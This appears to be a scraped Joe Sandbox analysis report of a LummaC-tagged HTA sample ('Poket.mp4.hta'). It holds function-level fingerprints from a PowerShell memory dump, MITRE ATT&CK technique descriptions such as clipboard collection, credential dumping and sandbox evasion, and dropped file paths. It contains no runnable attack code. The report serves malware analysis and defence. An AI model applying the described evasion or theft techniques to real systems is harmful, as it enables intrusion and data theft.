Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 42e250ec0e44a4668561dc083e6650d1a17bbabf3bbae363ee7f77cf5b860cc7
Instruction ID: 966d1e4078ed137a18ab4385f11ab7a767945ae8af2cd3ff17d1181515d9f815
Opcode Fuzzy Hash: 42e250ec0e44a4668561dc083e6650d1a17bbabf3bbae363ee7f77cf5b860cc7
Instruction Fuzzy Hash: 4EE0D1F69406404FCB16DF24ECC5A643355F7C5319709876ED501C7719E675E51BCB40

Function 0037C9F0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0037CA03

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 03beb493489d6c6ac604b8745d8e7ae8d019e3edf77c913ff50340181923d51a
Instruction ID: adebef2f04c846c24287176cb65a0ce58cacf6fd17ba048a3f7589db92b0d6db
Opcode Fuzzy Hash: 03beb493489d6c6ac604b8745d8e7ae8d019e3edf77c913ff50340181923d51a
Instruction Fuzzy Hash: 0BE0C2326941042BD349EA3DEC1BF12361F9381729F54832AB253C22D5D92499018264

Function 003ABDD0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,003B02C8,?,?,00000000,00000000,?,?), ref: 003ABDEE

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 06454546e9441a90ec33baef8e2b1f3e70f1d6b0dabd023381cf99213dc2168d
Instruction ID: f75ba90788e21be4b7956073c469a0042ddd2b04e7e3cb556ecc30d9bddda4ce
Opcode Fuzzy Hash: 06454546e9441a90ec33baef8e2b1f3e70f1d6b0dabd023381cf99213dc2168d
Instruction Fuzzy Hash: 75D0C931845122EBC6121F14EC06B863A58EF06320F060462B540AA071CA64EC5187D0

Non-executed Functions

Function 00395DC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 291COMMON

Download Yara Rule

Strings

UW, xrefs: 00395DEF
]_, xrefs: 00395E05
Y[, xrefs: 00395DFA
DE, xrefs: 00395E1B
b]9, xrefs: 00395D50
)m)o, xrefs: 00395DD9

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID:
String ID: )m)o$DE$b]9$UW$Y[$]_
API String ID: 0-3859509436
Opcode ID: 0b31933ebeb5afb7003201750e42ed7dd6a4e63d62e9dd0be7c8ef177d756a74
Instruction ID: 601459651b70eaa2fed79117ff3d99a9e93fb65611c5b7e629df9d29075e4b3c
Opcode Fuzzy Hash: 0b31933ebeb5afb7003201750e42ed7dd6a4e63d62e9dd0be7c8ef177d756a74
Instruction Fuzzy Hash: 6F81467234C3059BD7268F19AC427DFB7D5EBC5314F11993DF6988B382D67488069B82

Function 0038AFD7 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 407COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 0038B380

Strings

/, xrefs: 0038AF62
.N.L, xrefs: 0038B1F2
/, xrefs: 0038AEF7

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: .N.L$/$/
API String ID: 237503144-2067240300
Opcode ID: 358b522b87b11af811670c3ebef2370dfa414cd023657bd452d97266b38e6fcc
Instruction ID: 181f111c8629b25801b3dcf7f35bc78994ef87c2f403c3ca699725a37938a586
Opcode Fuzzy Hash: 358b522b87b11af811670c3ebef2370dfa414cd023657bd452d97266b38e6fcc
Instruction Fuzzy Hash: AAD104715083528BC325DF28C89166BFBF1EFD5324F198A6DE8C59B2A1E734C942CB52

Function 003A3890 Relevance: 9.1, APIs: 6, Instructions: 130clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 003A38B2
GetClipboardData.USER32 ref: 003A38D3
GlobalLock.KERNEL32 ref: 003A38F0
GetWindowLongW.USER32 ref: 003A3962
GlobalUnlock.KERNEL32 ref: 003A3A1D

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: ClipboardGlobal$DataLockLongOpenUnlockWindow
String ID:
API String ID: 4075365217-0
Opcode ID: fb5a48a3a30260fee7b6057efe99646398042c4e1de3f1a9894ae00c13665aa7
Instruction ID: 94571b06f86b141ce7e57a8e68d81ef530e44e20dac6e20a7242316410824940
Opcode Fuzzy Hash: fb5a48a3a30260fee7b6057efe99646398042c4e1de3f1a9894ae00c13665aa7
Instruction Fuzzy Hash: 5541F6B09086919ED702AF7CD44936EFFE0AF02314F05863CE4DA8B691D3799658C7A3

Function 00395A40 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 328COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00395B3F
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00395BC4

Strings

b]9, xrefs: 00395D50
tu, xrefs: 00395AC6

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: b]9$tu
API String ID: 237503144-3978716382
Opcode ID: 1835ad3f4c2308eb95781af1a17f39fd2cc1dc721f37e3e7790f97a39139e210
Instruction ID: c61fa21ea66b979ee4bfe2b9f60727f2e58b7adba5cf7d9c52587f3b679c1edb
Opcode Fuzzy Hash: 1835ad3f4c2308eb95781af1a17f39fd2cc1dc721f37e3e7790f97a39139e210
Instruction Fuzzy Hash: 119111713083049FD7168F28989179FBBE5EBC5718F15892CF5989B392C771980ADB82

Function 003A3A40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 003A3A89
GetSystemMetrics.USER32 ref: 003A3A99

Strings

, xrefs: 003A3B86

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 94b9e69caac89514200ac974902a598bcf917ea0ac36f458a20375e1ed37f312
Instruction ID: a98010c2ea6cdeea8451094e71d5a21e4f1b8ecc957a184484747bf285d9c699
Opcode Fuzzy Hash: 94b9e69caac89514200ac974902a598bcf917ea0ac36f458a20375e1ed37f312
Instruction Fuzzy Hash: 92B158B850D3808BD361DF25D5487DBBBE4BB8534CF40891EE6AC9B690CBB49548CF86

Function 003A31B9 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 93COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 003A31C2
VariantInit.OLEAUT32 ref: 003A31CE

Strings

F, xrefs: 003A321C
x, xrefs: 003A3234
@, xrefs: 003A3214
~, xrefs: 003A323C
-, xrefs: 003A31F8
B, xrefs: 003A320C
D, xrefs: 003A3224
$, xrefs: 003A3228
z, xrefs: 003A322C
*, xrefs: 003A3208
T, xrefs: 003A31E4
J, xrefs: 003A31EC
L, xrefs: 003A3204
|, xrefs: 003A3244
H, xrefs: 003A31F4
6, xrefs: 003A3218
N, xrefs: 003A31FC

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: Variant$ClearInit
String ID: $$*$-$6$@$B$D$F$H$J$L$N$T$x$z$|$~
API String ID: 2610073882-889373959
Opcode ID: 96def5faa15acb81d52929a398b52a5a605d106e3c8c44b6fb39b15666922e4f
Instruction ID: 7c4c7f6d3545eb8caa77478fc1748fbc26c3a67f53de59ed613967b207254c5f
Opcode Fuzzy Hash: 96def5faa15acb81d52929a398b52a5a605d106e3c8c44b6fb39b15666922e4f
Instruction Fuzzy Hash: 514129611087C08FDB16CF38C498746BFA1AFA6218F08C69CC9990F3DBD7799519C7A6

Function 003A305D Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 83COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 003A3066
VariantInit.OLEAUT32 ref: 003A3072

Strings

T, xrefs: 003A3088
$, xrefs: 003A30CC
*, xrefs: 003A30AC
z, xrefs: 003A30D0
~, xrefs: 003A30E0
H, xrefs: 003A3098
-, xrefs: 003A309C
N, xrefs: 003A30A0
@, xrefs: 003A30B8
L, xrefs: 003A30A8
J, xrefs: 003A3090
6, xrefs: 003A30BC
D, xrefs: 003A30C8
x, xrefs: 003A30D8
F, xrefs: 003A30C0
|, xrefs: 003A30E8
B, xrefs: 003A30B0

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: Variant$ClearInit
String ID: $$*$-$6$@$B$D$F$H$J$L$N$T$x$z$|$~
API String ID: 2610073882-889373959
Opcode ID: e19ad6af4dbcaa506d654075a6c5958ea25e98fd8997dd5f9e23967cc61fec64
Instruction ID: aba5399db8ad63efd3dcfebac71b179e9fa3b9a266e078794d35262fc2dd03aa
Opcode Fuzzy Hash: e19ad6af4dbcaa506d654075a6c5958ea25e98fd8997dd5f9e23967cc61fec64
Instruction Fuzzy Hash: 234106602087C08EDB16CF28C4D8716BFA16B66218F08C6DCDA994F39BC6B99519C766

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Poket.mp4.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_050jdya4.ruo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_folgnwu5.ytr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5tb4l1q.vju.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtvknccl.cy2.ps1

Static File Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Poket.mp4.hta

Function 06FE83C0 Relevance: 21.9, Strings: 17, Instructions: 682
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre